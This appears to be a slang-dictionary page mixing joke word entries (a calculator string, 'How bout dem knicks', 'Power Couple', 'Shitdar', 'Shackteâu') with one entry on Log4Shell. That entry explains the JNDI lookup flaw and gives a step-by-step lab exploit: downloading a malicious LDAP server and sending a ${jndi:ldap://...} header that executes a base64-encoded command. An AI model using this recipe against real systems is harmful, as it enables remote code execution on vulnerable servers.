Skip to main content

0%÷root(∛√(1÷789), log(log2(atan(acos(asin(456!)))×e×123+asinh(acosh(atanh(π×0.0484041570)))))) 

You went to the calculator app on a apple device and went to scientific mode and just pressed every button left to right
I am so 0%÷root(∛√(1÷789), log(log2(atan(acos(asin(456!)))×e×123+asinh(acosh(atanh(π×0.0484041570))))))

Log4Shell 

The Java Naming and Directory Interface (JNDI) allows for lookup of Java objects at program runtime given a path to their data. JNDI can leverage several directory interfaces, each providing a different scheme of looking up files. Among these interfaces is the Lightweight Directory Access Protocol (LDAP), a non-Java-specific protocol which retrieves the object data as a URL from an appropriate server, either local or anywhere on the Internet.

In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form ${prefix:name}. For example, Text: ${java:version} might be converted to Text: Java version 1.7.0_67. Among the recognized expressions is ${jndi:<lookup>}; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://example.com/file}, for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. Even if execution of the data is disabled, an attacker can still retrieve data—such as secret environment variables—by placing them in the URL, in which they will be substituted and sent to the attacker's server. Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP).
To execute commands with Log4Shell, I’ll be spinning up an LDAP server with the capabilities to exploit JNDI injection attacks written by feihong-cs. Run the following to download the malicious LDAP server:

cd /tmp
wget --quiet github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zipunzip JNDIExploit.v1.2.zip

With the ZIP archive decompressed, we can retrieve the programs help menu with the following command:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -h

To start the malicious LDAP server on localhost:1389 (there will also be an HTTP server spun up on port 9001. Looking at the source code tells me that this is where the actual malicious Java class is being loaded from), run the following command:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 127.0.0.1 -p 9001

And finally, to obtain our reverse shell, let’s base64 encode a echo command to write some data into a file in the /tmp folder (make sure to get rid of the + sign by adding extra spaces as needed):

echo -n 'echo "you have been pwned" > /tmp/note.txt' | base64 -w 0

And then make the following request to the vulnerable application:

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/ZWNobyAieW91IGhhdmUgYmVlbiBwd25lZCIgPiAvdG1wL25vdGUudHh0}'

We can then confirm that the command was executed by going into the container with docker exec -it log4shell-app sh and then confirm that the file note.txt was created in the /tmp folder:
Log4Shell by Bad C dev December 15, 2021

How bout dem knicks? 

A phrase referring twoard the New York Knicks.
Its usually said to break an unplesent moment of silence.
Guy 1: I think I may be gay.
Guy 2: ...
Guy 1: ...
Guy 2: How bout dem knicks?
How bout dem knicks? by Flame060 March 28, 2005
Word of the Day on June 8, 2026

Power Couple 

A relationship between two people who are equally as cool as each other. They are as individually awesome and fun to be around as they are when they are together.

Neither one depends on the other for their feelings of self worth- they know in their heart that they are just as valuable to the world as the other. Good looking, optimistic, and sparks a light in the world that people recognize that goes beyond a normal relationship.

In a power couple, if one person is flawed, the other person makes up for their weaknesses in strength. Together they are the epitome of what anyone would desire in a relationship. They encourage goodness in the world and make it a better place by being together.
I'm a fan of those two, they are such a power couple, the epitome of what anyone would want in a relationship.

I am envious of them because they are a power couple.
Power Couple by Pina28 May 23, 2012
Word of the Day on June 7, 2026
Spidey sense for evading poop on the street, canine or otherwise.
When walking in NYC or LA, you need shitdar.
Shitdar by Sickomonster June 3, 2026
Word of the Day on June 6, 2026

Shackteâu

A Shackteau is a humble, weather-beaten, structurally questionable shelter located in a spectacular or highly coveted place—Wales, Jackson Hole, Sun Valley, Crested Butte, coastal Maine, the Alps—where the building itself may be worth almost nothing, but the dirt, view, access, and mythology make it absurdly valuable.
In use:
Shackteâu - We thought it was an abandoned shed until the realtor called it a rare alpine Shackteâu with unobstructed views and listed it for $2 million.
Shackteâu by ez-dog June 4, 2026
Word of the Day on June 5, 2026